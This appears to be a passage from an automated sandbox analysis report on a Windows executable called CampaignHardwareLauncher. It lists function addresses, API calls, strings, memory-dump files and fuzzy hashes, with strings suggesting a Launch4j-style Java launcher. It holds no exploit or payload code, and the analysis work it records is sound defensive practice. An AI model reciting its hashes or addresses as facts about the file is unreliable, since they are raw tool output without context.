                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 661c79fa3b8ac9abb4e224266d4cded6d62ffdd14050f3927dba7b757e43ebb2
                                                                                                                                                                                                                                                                                                                • Instruction ID: f042ff4e9afc238231ba2f0a1a21a068439de561cfa6daf720de4363d65ecbf7
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 661c79fa3b8ac9abb4e224266d4cded6d62ffdd14050f3927dba7b757e43ebb2
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23F0F4B1A047154BDB14AF39C09139BBBF2AF40348F86C43EC987732C2D37C99608A02
                                                                                                                                                                                                                                                                                                                Function 00406ACE Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 619 406ace 620 406ad0-406ae4 619->620 622 406ae6-406afe GetModuleHandleA 620->622 623 406b00 622->623 624 406b04-406b21 call 4013b0 622->624 623->624
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: acdd093e482f5bde7bba130dde77f32350e70ae8059faee5c55a3686f59b36ed
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3ce4b8eff68f737e1e19327138148219799e312e833f16ad5da121a4cd60d1db
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acdd093e482f5bde7bba130dde77f32350e70ae8059faee5c55a3686f59b36ed
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF0A0B6A083244ADB04AF7AC18136AFFF1AF45358F45C47ED985626D2D27C8550CB52
                                                                                                                                                                                                                                                                                                                Function 00401290 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 627 401290-4012a3 __set_app_type call 401150 629 4012a8-4012a9 627->629
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 0040129D
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,004012A8), ref: 00401161
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: __getmainargs.MSVCRT ref: 0040119A
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: _setmode.MSVCRT ref: 004011D5
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: _setmode.MSVCRT ref: 004011FB
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: __p__fmode.MSVCRT ref: 00401200
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: __p__environ.MSVCRT ref: 00401215
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: _cexit.MSVCRT ref: 00401239
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401241
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode__set_app_type_cexit
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 250851222-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: f8f8779216d611a18a63dbf5b8c311eb09e190107aa71f1f2c959bcc01329ce4
                                                                                                                                                                                                                                                                                                                • Instruction ID: f3566ed841fe2c78bbec3e3585cf37c7a6b3b3915cdcc1304e07bfa49eda4ab5
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f8779216d611a18a63dbf5b8c311eb09e190107aa71f1f2c959bcc01329ce4
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3C09B3041421497C3003FB5DC0E359BBA87B05305F41443CD5C967261D67839054796

                                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                                Function 00401ED0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 116stringwindowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004013DA), ref: 00401ED7
                                                                                                                                                                                                                                                                                                                • puts.MSVCRT ref: 00401F11
                                                                                                                                                                                                                                                                                                                • ShellExecuteA.SHELL32 ref: 00401F5A
                                                                                                                                                                                                                                                                                                                • printf.MSVCRT ref: 00401F89
                                                                                                                                                                                                                                                                                                                • fclose.MSVCRT ref: 00401F93
                                                                                                                                                                                                                                                                                                                • MessageBoxA.USER32 ref: 00401FBF
                                                                                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(?,?,?,?,?,?,?,?,004013DA), ref: 00401FFD
                                                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040201F
                                                                                                                                                                                                                                                                                                                • strcat.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013DA), ref: 00402040
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013DA), ref: 0040204B
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 0040206D
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Message$ErrorExecuteFormatFreeLastLocalShellfclosefprintfprintfputsstrcatstrlen
                                                                                                                                                                                                                                                                                                                • String ID: An error occurred while starting the application.$Error msg:%s$Error:%s$Open URL:%s$open
                                                                                                                                                                                                                                                                                                                • API String ID: 1449747937-1100426463
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1d01a69e9d7fb2250e9da01269d9a9a695086d462b34391a24b83a14a180ea29
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2d12064388d49b1e09197d997951df6f1fa04ecba0d9f77cc5412a013d33004a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d01a69e9d7fb2250e9da01269d9a9a695086d462b34391a24b83a14a180ea29
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5041F1B0B083019BD704EF29D68525FBAE1BB84344F11C83FE589A7391D77C89559B8B
                                                                                                                                                                                                                                                                                                                Function 004042B0 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 286stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockstrlen$strcat$ErrorLastfprintf
                                                                                                                                                                                                                                                                                                                • String ID: - $-bit$An error occurred while starting the application.$Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 484976878-3376466240
                                                                                                                                                                                                                                                                                                                • Opcode ID: b992894269d4df67585a336ef44875f4a4d0f1fa0297b5c6ea2c178211651a31
                                                                                                                                                                                                                                                                                                                • Instruction ID: 34e31f97e9555f3506bafa7709ed99a0cf1f3aa383949e3ef6a0ea41d6191ac0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b992894269d4df67585a336ef44875f4a4d0f1fa0297b5c6ea2c178211651a31
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50B170B07183018BD704EF3AD64035ABAE1BB84344F05C93ED989E7391D77DC9658B9A
                                                                                                                                                                                                                                                                                                                Function 00402920 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 218stringregistryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strcpy$memsetstrcmpstrlen$fprintfstrcat$EnumOpenstrchrstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: %s-bit search:%s...$Check:%s$Ignore:%s$Match:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 972160396-103288940
                                                                                                                                                                                                                                                                                                                • Opcode ID: c86c034fc67a71293e03635b1d03b0b522562ab163ebdae5596db442e3a19ad0
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9a2c2f7deab8620c59848cd1e9c546dad7476eac0264ac07e1180a0b30e31d97
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c86c034fc67a71293e03635b1d03b0b522562ab163ebdae5596db442e3a19ad0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25A12AB49087149BC711EF25C98429EFBF5AF84704F0188BFE489A7391D7789A858F86
                                                                                                                                                                                                                                                                                                                Function 00403100 Relevance: 43.9, APIs: 16, Strings: 9, Instructions: 186stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strcat$strncat$memsetstrchr$CurrentDirectoryEnvironmentVariablestrlenstrstr
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$EXEDIR$EXEFILE$HKEY$JREHOMEDIR$OLDPWD$PWD$Substitute:%s = %s
                                                                                                                                                                                                                                                                                                                • API String ID: 3324974479-3356529774
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6614e760f1d2ee19f4b253176852c44bfd1491407e5a90ce63a812219ddd9ebb
                                                                                                                                                                                                                                                                                                                • Instruction ID: ed202c75566bdcf25b9861d036979bf7c043f81e68319857b6959b64db836d4b
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6614e760f1d2ee19f4b253176852c44bfd1491407e5a90ce63a812219ddd9ebb
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80711C759043159BCB54DF25C88025ABBE5FF84314F41C8BEE98DA7381DB389E85CB8A
                                                                                                                                                                                                                                                                                                                Function 004033F0 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Heap %s:Requested %d MB / %d%%, Available: %d MB, Heap size: %d MB, xrefs: 00403688
                                                                                                                                                                                                                                                                                                                • Heap limit:Reduced %d MB heap size to 32-bit maximum %d MB, xrefs: 004036B0
                                                                                                                                                                                                                                                                                                                • Resource %d:%s, xrefs: 004034A3, 00403563
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockatoifprintfstrlen$ErrorLast_itoastrcat
                                                                                                                                                                                                                                                                                                                • String ID: Heap %s:Requested %d MB / %d%%, Available: %d MB, Heap size: %d MB$Heap limit:Reduced %d MB heap size to 32-bit maximum %d MB$Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 1284713559-335395982
                                                                                                                                                                                                                                                                                                                • Opcode ID: 49b52521ad4b28281b4610723bdc3fecec1105f7fc221ab9df715c009cf8496d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 556c7044ae09a008ffae0a8d9fc69ada731a51744f4509117c473fc4c8ef08ad
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49b52521ad4b28281b4610723bdc3fecec1105f7fc221ab9df715c009cf8496d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC916FB19083159BDB14EF69C58025FBBF5BF88304F05883EE889AB391D738D915CB86
                                                                                                                                                                                                                                                                                                                Function 00401C30 Relevance: 36.9, APIs: 12, Strings: 9, Instructions: 108stringfileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strstr$fprintfmemset$EnvironmentVariablefopenstrlenstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: Version:%s$--l4j-debug$--l4j-debug-all$3.9$CmdLine:%s %s$debug$debug-all$j.lo$nch4
                                                                                                                                                                                                                                                                                                                • API String ID: 1991431792-3923029096
                                                                                                                                                                                                                                                                                                                • Opcode ID: a285fad08061a693a5248468f59be63a75b3341ece323a7797179705ea493636
                                                                                                                                                                                                                                                                                                                • Instruction ID: 60ffc86f505bfdbbbba3efb310094abc59b8358325a5033e9b193ab27e218064
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a285fad08061a693a5248468f59be63a75b3341ece323a7797179705ea493636
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA411DB49083059BC710AF6AC58056EFBE5EF84754F01C83FE989AB391D738D851DB8A
                                                                                                                                                                                                                                                                                                                Function 00405B60 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 121stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • --l4j-, xrefs: 00405C50, 00405C8E
                                                                                                                                                                                                                                                                                                                • -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd, xrefs: 00405C13, 00405C2F, 00405CAE, 00405CCA
                                                                                                                                                                                                                                                                                                                • Resource %d:%s, xrefs: 00405D11
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$strcatstrlenstrstr$ErrorFindLastLoadLockmemsetstrchrstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: --l4j-$-Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd$Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 782867121-4005303488
                                                                                                                                                                                                                                                                                                                • Opcode ID: ac6294b31dbabfa38df6261dad10e70e22e75e7ae9a4ecf5308ff82ecc24c60d
                                                                                                                                                                                                                                                                                                                • Instruction ID: d40fd4806269129820aebf3143e2994a5f350a870bc7b93ef3ae692e42a163e9
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac6294b31dbabfa38df6261dad10e70e22e75e7ae9a4ecf5308ff82ecc24c60d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6414DB0908B019AE714AF29C54432BBAE5EF45704F01C87FE589A73C2D73D88958F9B
                                                                                                                                                                                                                                                                                                                Function 004023B0 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 118stringregistryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strstr$Open$CloseQueryValuestrchrstrrchr
                                                                                                                                                                                                                                                                                                                • String ID: HKEY$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS
                                                                                                                                                                                                                                                                                                                • API String ID: 356245303-4236897492
                                                                                                                                                                                                                                                                                                                • Opcode ID: a1b4684ee25663612e490b4be978381a64ee457d4bbee82a063a929b877f78fc
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2ae7df6790b6f1853f37995f78c893f74154cd1711da3b843cecc37fcb260c67
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1b4684ee25663612e490b4be978381a64ee457d4bbee82a063a929b877f78fc
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B414FB5D087069BDB00EF69C98425EFBE1BF84314F05883FE988A7381D77899448B96
                                                                                                                                                                                                                                                                                                                Function 00403B77 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 111stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Working dir:%s, xrefs: 00403CBF
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher, xrefs: 00403BCC
                                                                                                                                                                                                                                                                                                                • Resource %d:%s, xrefs: 00403CFD
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
